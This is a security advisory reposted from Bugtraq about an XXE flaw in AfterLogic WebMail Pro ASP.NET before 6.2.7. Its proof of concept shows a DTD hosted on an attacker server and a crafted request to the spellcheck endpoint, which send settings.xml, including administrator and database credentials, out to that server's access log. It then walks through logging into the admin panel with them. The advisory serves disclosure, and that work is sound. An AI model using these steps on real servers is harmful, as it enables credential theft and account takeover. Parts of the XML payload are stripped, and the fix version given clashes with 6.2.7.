Bugtraq: AfterLogic WebMail Pro ASP.NET < 6.2.7 Administrator Account Takover via XXE Injection

1. ADVISORY INFORMATION

========================================

Title: AfterLogic WebMail Pro ASP.NET Administrator Account Takover via XXE Injection

Application: AfterLogic WebMail Pro ASP.NET

Class: Sensitive Information disclosure

Remotely Exploitable: Yes

Versions Affected: AfterLogic WebMail Pro ASP.NET < 6.2.7

Vendor URL: http://ift.tt/20tUenG

Bugs: XXE Injection

Date of found: 28.03.2016

Reported: 22.05.2016

Vendor response: 22.05.2016

Date of Public Advisory: 23.05.2016

2. CREDIT

========================================

This vulnerability was identified during penetration test

by Mehmet INCE & Halit Alptekin from PRODAFT / INVICTUS

3. VERSIONS AFFECTED

========================================

AfterLogic WebMail Pro ASP.NET < 6.2.7

4. INTRODUCTION

========================================

It seems that /webmail/spellcheck.aspx?xml= endpoint takes XML request as an parameter and parse it with XML entities.

By abusing XML entities attackers can read Web.config file as well as settings.xml that contains administrator account

credentials in plain-text.

5. TECHNICAL DETAILS & POC

========================================

1 - Put following XML entity definition into your attacker server. E.g: /var/www/html/test.dtd. Do NOT forget to change ATTACKER_SERVER_IP.

">

2 - Start reading access log on your attacker server.

tail -f /var/log/apache/access.log

3 - Send following HTTP GET request to the target.

http://TARGET_DOMAIN/webmail/spellcheck.aspx?xml=

%remote;

%int;

%trick;]>

4 - You will see the settings.xml content in your access log.

5 - In order to decode and see it in pretty format. Please follow instruction in order.

5.1 - Create urldecode alias by executing following command.

alias urldecode='python -c "import sys, urllib as ul; print ul.unquote_plus(sys.argv[1])"'

5.2 - Get last line of access log and pass it to the urldecode.

root@hacker:/var/www/html# urldecode $(tail -n 1 /var/log/apache2/access.log|awk {'print $7'})

/?p=

[SITE_NAME_WILL_BE_HERE]

[LICENSE_KEY]/LicenseKey>

[ADMINISTRATOR_USERNAME]

[ADMINISTRATOR_PASSWORD]

MSSQL

WebMailUser

[DATABASE_PASSWORD]

Webmail

localhost\SQLEXPRESS

....

....

...

6 - You can login by using these administration credentials.

Login panel is located at http://TARGET_DOMAIN/webmail/adminpanel/

6. RISK

========================================

The vulnerability allows remote attackers to read sensitive information

from the server such as settings.xml or web.config which contains administrator

account and database credentials.

7. SOLUTION

========================================

Update to the latest version v1.4.2

8. REPORT TIMELINE

========================================

28.03.2016: Vulnerability discovered during pentest

29.03.2016: Our client requested a time to mitigate their infrastructures

22.05.2016: First contact with vendor

22.05.2016: Vendor requested more technical details.

23.05.2016: Vendor publishes update with 6.2.7 release.

23.05.2016: Advisory released

9. REFERENCES

========================================

https://twitter.com/afterlogic/status/734764320165400576

[ reply ]

from SecurityFocus Vulnerabilities http://ift.tt/25dk96l